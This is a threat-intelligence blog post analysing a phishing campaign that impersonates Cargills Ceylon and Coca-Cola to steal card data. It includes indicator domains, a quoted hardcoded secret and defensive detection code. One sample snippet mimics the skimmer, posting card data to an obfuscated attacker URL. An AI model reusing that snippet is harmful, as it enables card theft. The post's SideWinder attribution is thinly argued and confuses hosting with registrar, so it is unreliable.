Cargills Ceylon and Coca-Cola Targeted by SideWinder APT in a Sophisticated Phishing Campaign
Threat Intelligence

Nathaneal Meththananda, CEO & Founder of ZavenTrek, Offensive Security Consultant
Sri Lanka has repeatedly found itself in the crosshairs of nation-state hackers over the past years, yet the nation's cybersecurity posture remains alarmingly underdeveloped. This negligence has left critical infrastructure and citizens exposed to relentless cyber threats.

In a recent alarming discovery, intelligence analysts at Secualyze have uncovered a sophisticated phishing operation where adversaries have impersonated one of Sri Lanka's most iconic enterprises, Cargills Ceylon. By leveraging the trusted reputation of this prominent organization, the attackers aim to deceive unsuspecting users into divulging sensitive personal and financial information through fraudulent phishing pages.

This chilling revelation underscores a grave reality: Sri Lanka's infrastructure is being exploited by global threat actors to conduct advanced nation-state operations. The use of trusted local brands in these campaigns amplifies their effectiveness, luring victims into a false sense of security.

The implications are dire. If such campaigns continue unchecked:

  • Personal and financial data of Sri Lankan citizens could fall into the hands of adversaries.
  • Critical national infrastructure may be at risk of compromise.
  • The country could become a hub for nation-state cyber warfare, further eroding its digital sovereignty.

This is a wake-up call. Sri Lanka can no longer afford to underestimate the scale and sophistication of these threats. The nation must take immediate action to fortify its cybersecurity defenses, educate its citizens about online risks, and invest in robust protective measures.

The stakes have never been higher, and the consequences of inaction could be catastrophic.

Intelligence Analysis

Leveraging the intelligence lead received, Secualyze analysts initiated an in-depth analysis of the phishing link using advanced open-source tools to uncover its origins and methodologies.

[Screenshot: phishing page titled "Fresh Signature", captured in Firefox on 2024-11-23]

When users click on the phishing link, they are directed to a deceptive webpage designed to solicit sensitive personal information, including their home address. The collected details are subsequently used to create an account on the domain https://gardentimego.com, a site flagged as malicious by multiple threat detection tools and widely identified as part of a phishing campaign.

Payment Gateway Analysis

Payment gateways are secure platforms that facilitate the transfer of payment information between customers, merchants, and financial institutions. They enable online transactions by encrypting sensitive data, verifying payment details, and ensuring seamless and secure processing of credit card or digital wallet payments.

Given that this is a targeted attack specifically aimed at Sri Lanka, the implementation of the enable-cross-platform function is unnecessary. This feature is typically designed to accommodate payments across multiple countries, which is not relevant in this context.


Source Code Analysis of the Payment Gateway

Analysis of the payment gateway's source code reveals that, even when users input accurate credit card details, the system falsely indicates that the payment has been declined.


The URL https://gardentimego.com/ employs the same payment gateway logic, wherein valid credit card details are falsely flagged as inaccurate.

[Screenshot: gardentimego.com cart checkout page]

Breakdown of the Gardentimego Payment Gateway Source Code

  • Hardcoded Keys and Tokens:

The code includes hardcoded values for `key`, `pgw_token`, and an `x-csrf-token`. These are sensitive data elements that should not be exposed in client-side code. The `key` value appears to be Base64 encoded, but encoding is not protection: anyone with access to the source code can decode it.

  • Encryption and Tokenization:

The use of `CryptoJSAesJson.encrypt` to create the `pgw_token` raises questions about whether the implementation is secure and whether key management is robust. If the secret key `'OAmPTpDJN195kzldm1HZFNn2j54ncD5x'` is hardcoded or otherwise insecure, the encryption provides little real protection.

  • AJAX Call and Sensitive Data:

The AJAX call sends sensitive information (`pgw_token` and `kount_id`) to a URL that appears to be Base64 encoded; the decoded domain (`gardentimego.com`) should be validated to confirm it is a legitimate payment gateway domain.

The use of `async: false` in the AJAX call is a deprecated practice and generally indicates poor coding standards.

  • Hardcoded CSRF Token:

The `x-csrf-token` is hardcoded, which is unusual. CSRF tokens are normally generated dynamically for each session or request to protect against cross-site request forgery attacks.

These traits are highly irregular for a payment gateway: the source code includes a hardcoded CSRF token and predefined URL paths.
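As an added example (not code from the phishing page or from the Secualyze analysis), the following script applies the checks in this breakdown to a captured checkout script: it decodes Base64 literals to reveal the real submission endpoint, and flags a hardcoded `key`, a hardcoded CryptoJS secret, a static `x-csrf-token`, and `async: false`. The sample source, its placeholder key and tokens, and the `merchant.example` host are constructed for the example.

```javascript
// Added example, not the phishing page's own code: static triage of a captured
// checkout script for the traits listed above. The sample source is constructed;
// its key, tokens and endpoint are placeholders, not values from the real page.
const ENCODED_ENDPOINT = Buffer.from("https://gardentimego.com/api/pay").toString("base64");
const SAMPLE_CHECKOUT_SRC = `
var key = "cGxhY2Vob2xkZXIta2V5";
var pgw_token = CryptoJSAesJson.encrypt(JSON.stringify(card), 'PLACEHOLDER_SECRET_KEY_NOT_REAL');
$.ajax({
  url: atob("${ENCODED_ENDPOINT}"),
  type: "POST", async: false,
  headers: { "x-csrf-token": "placeholder-static-csrf-token" },
  data: { pgw_token: pgw_token, kount_id: kount_id }
});`;

// Decode every Base64-looking string literal; keep the ones that turn into URLs.
function decodeEmbeddedUrls(src) {
  const urls = [];
  for (const m of src.matchAll(/["']([A-Za-z0-9+/]{16,}={0,2})["']/g)) {
    const text = Buffer.from(m[1], "base64").toString("utf8");
    if (/^https?:\/\/[^\s"']+$/.test(text)) urls.push(text);
  }
  return urls;
}

// Return the findings a reviewer would raise, plus every host the script posts to.
// expectedHost is the merchant domain the page claims to belong to (assumed parameter).
function auditCheckoutScript(src, expectedHost) {
  const findings = [];
  if (/\bkey\s*=\s*["'][A-Za-z0-9+/=]+["']/.test(src)) findings.push("hardcoded-key");
  if (/CryptoJSAesJson\.encrypt\([^,]+,\s*["'][^"']+["']\)/.test(src)) findings.push("hardcoded-encryption-key");
  if (/["']x-csrf-token["']\s*:\s*["'][^"']+["']/i.test(src)) findings.push("hardcoded-csrf-token");
  if (/async\s*:\s*false/.test(src)) findings.push("synchronous-xhr");
  const decodedUrls = decodeEmbeddedUrls(src);
  const hosts = decodedUrls.map((u) => new URL(u).hostname);
  if (hosts.some((h) => h !== expectedHost)) findings.push("submission-to-unexpected-host");
  return { findings, decodedUrls, hosts };
}

// Placeholder merchant host: the decoded endpoint does not belong to it, so it is flagged.
const report = auditCheckoutScript(SAMPLE_CHECKOUT_SRC, "merchant.example");
console.log(JSON.stringify(report, null, 2));
```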

Note: 

Whatever details the user enters on the root phishing page are reused to register an account for that user at https://gardentimego.com/.

Undercover domains being used in payment gateway submission

When users submit their credit card information, the data is transmitted to https://gardentimego.com with the 'Referer' header pointing to `https://bestpurchasediscounts.xyz`. Notably, `https://bestpurchasediscounts.xyz` has been flagged as malicious by detection tools.


The .xyz domain resolves to the IP address `104.21.64.151`, a Cloudflare server. However, this server has been observed facilitating communication with files exhibiting malicious intent.
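The Referer/Host split described above is something a defender can hunt for in web-proxy logs. The following is an added example, not part of the original report: it parses constructed log lines, flags requests to or from the domains named in this report, and raises a cross-domain checkout alert when card data is posted to a site other than the one the user was on. The `.example` and `.test` hosts and the `KNOWN_GATEWAYS` allowlist of sanctioned payment hosts are assumptions.

```javascript
// Added example, not from the original report: detection logic over web-proxy logs
// for the Referer/Host split described above, where card data submitted on a brand
// lookalike is posted to a different domain. Log lines and the .example/.test hosts
// are constructed; the watchlist holds only domains named in this report.
const WATCHLIST = new Set(["gardentimego.com", "bestpurchasediscounts.xyz",
  "treasurecity.world", "toolkitcolor.com", "aqualimx.com"]);
const KNOWN_GATEWAYS = new Set(["pay.example"]); // assumed allowlist of sanctioned PSP hosts

const SAMPLE_PROXY_LOG = [ // format: timestamp method url referer status ("-" = no referer)
  "2024-11-23T20:24:01Z GET https://bestpurchasediscounts.xyz/offer - 200",
  "2024-11-23T20:24:40Z POST https://gardentimego.com/cart/checkout https://bestpurchasediscounts.xyz/offer 200",
  "2024-11-23T20:25:03Z GET https://aqualimx.com/thanks https://gardentimego.com/cart/checkout 200",
  "2024-11-23T20:30:00Z POST https://shop.example/cart/checkout https://shop.example/cart 200",
  "2024-11-23T20:31:10Z POST https://pay.example/checkout https://shop.example/cart 200",
  "2024-11-23T20:32:45Z POST https://checkout.unknown-host.test/cart/checkout https://shop.example/cart 200",
];

// Registrable-domain approximation (last two labels); a public-suffix list is more exact.
const siteOf = (host) => host.split(".").slice(-2).join(".");

function parseProxyLine(line) {
  const [ts, method, url, referer, status] = line.trim().split(/\s+/);
  return { ts, method, url, referer: referer === "-" ? null : referer, status: Number(status) };
}

// One alert per suspicious request, carrying every reason that fired.
function analyzeProxyLog(lines, watchlist = WATCHLIST, knownGateways = KNOWN_GATEWAYS) {
  const alerts = [];
  for (const line of lines) {
    const rec = parseProxyLine(line);
    const u = new URL(rec.url);
    const refHost = rec.referer ? new URL(rec.referer).hostname : null;
    const reasons = [];
    if (watchlist.has(u.hostname)) reasons.push("watchlisted-host");
    if (refHost && watchlist.has(refHost)) reasons.push("watchlisted-referer");
    // A card-data POST whose Referer site differs from the destination site, unless the
    // destination is a sanctioned hosted checkout (legitimate PSPs would otherwise fire).
    const checkoutLike = rec.method === "POST" && /checkout|cart|pay/i.test(u.pathname);
    if (checkoutLike && refHost && siteOf(refHost) !== siteOf(u.hostname)
        && !knownGateways.has(u.hostname)) reasons.push("cross-domain-checkout");
    if (reasons.length) alerts.push({ ts: rec.ts, host: u.hostname, reasons });
  }
  return alerts;
}

for (const a of analyzeProxyLog(SAMPLE_PROXY_LOG)) console.log(a.ts, a.host, a.reasons.join(","));
```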

[Screenshot: VirusTotal graph for the domain, captured 2024-11-23]

Nearly all of the domains involved are registered through NameSilo and use the .xyz top-level domain, which strongly suggests that the SideWinder group is behind this operation.

[Screenshot: VirusTotal domain report for bestpurchasediscounts.xyz]

The registration of .xyz domains through NameSilo follows a distinct pattern consistently employed by the SideWinder APT group in their operations over the past years.

Second Submission: Next Rotation of Domains

On the root page, each submission triggers a change in the domain, indicating that the adversaries have implemented domain rotation as a measure to maintain operational security (OPSEC).

Using the provided details, an account is created on the https://gardentimego.com website. Additionally, from the Coca-Cola information form, users are redirected to the https://treasurecity.world site, where another fraudulent checkout process is implemented to steal credit card information.


The payment gateway for the second round is implemented on toolkitcolor.com, where the same logic is applied. In this instance, valid credit card details are erroneously flagged as incorrect.

[Screenshot: payment page, captured 2024-11-23]

The treasurecity.world website is hosted within the same infrastructure as the adversary's other malicious sites, residing on the same Autonomous System Number (ASN). This indicates that the adversary is leveraging a centralized hosting environment, likely to maintain control over their operations and ensure the seamless operation of their malicious activities.

After submitting the credit card details, the user is redirected to a page that thanks them for subscribing. However, upon further analysis, the page to which the user is redirected, aqualimx.com, is unrelated to the original purpose of the payment. This diversion is part of a malicious scheme, where the adversaries exploit the payment gateway to gather sensitive financial information while misleading users with a false subscription confirmation. The redirection to an unrelated domain serves as an additional layer of deception, further obfuscating the true intent behind the fraudulent transaction.

[Screenshot: "Subscribing!" confirmation page, captured 2024-11-23]

The domain aqualimx.com has been flagged as malicious and resolves to the IP address 87.120.84.224. According to VirusTotal Intelligence, this domain is associated with the distribution of malicious files, further indicating its role in the adversary's cybercriminal operations. 

The communication between this domain and the infected systems suggests that it is part of a larger infrastructure designed to facilitate data exfiltration or the delivery of additional payloads to compromise the targeted systems.

[Screenshot: VirusTotal domain report for aqualimx.com]

The domains identified in this report are all hosted under an organization named 'Net4India.' Upon further analysis, it has been observed that a significant number of domains hosted by this registrar are linked to malicious activities, primarily phishing-related operations.

This pattern suggests a potential abuse of the registrar's infrastructure by threat actors to facilitate cybercrime, including the distribution of phishing campaigns and the hosting of fraudulent websites. The repeated association of malicious domains with this particular registrar raises concerns about the security measures in place to prevent such misuse.


Conclusion

This report highlights the tactics employed by adversaries to deceive users into providing their credit card details for theft. The operation targeted Asian countries, including Sri Lankan enterprises, leveraging phishing pages to harvest sensitive data. These phishing campaigns were hosted on platforms like 'NameSilo,' utilizing .xyz domains, a consistent pattern observed in the historical operations of the SideWinder APT group.

Secualyze Copyright 2024. Developed by Vebula